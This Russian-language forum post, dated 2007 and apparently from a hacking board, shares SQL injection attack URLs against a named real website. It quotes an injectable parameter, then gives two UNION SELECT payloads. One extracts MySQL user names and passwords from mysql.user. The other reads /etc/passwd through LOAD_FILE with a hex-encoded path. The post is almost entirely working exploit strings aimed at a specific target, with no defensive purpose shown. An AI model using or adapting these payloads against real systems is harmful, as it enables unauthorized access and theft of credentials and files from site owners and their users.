
09.03.2007, 21:29
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме: 2924346
Репутация:
1719
|
|
Сообщение от KPOT_f!nd
PHP код:
www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=8'
можно кста вот так:
Код:
http://www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=-1'+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,12+from+mysql.user+limit+0,1/*
&&
Код:
http://www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=-1'+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12+from+mysql.user/*
Последний раз редактировалось n1†R0x; 09.03.2007 в 23:40..
|
|
|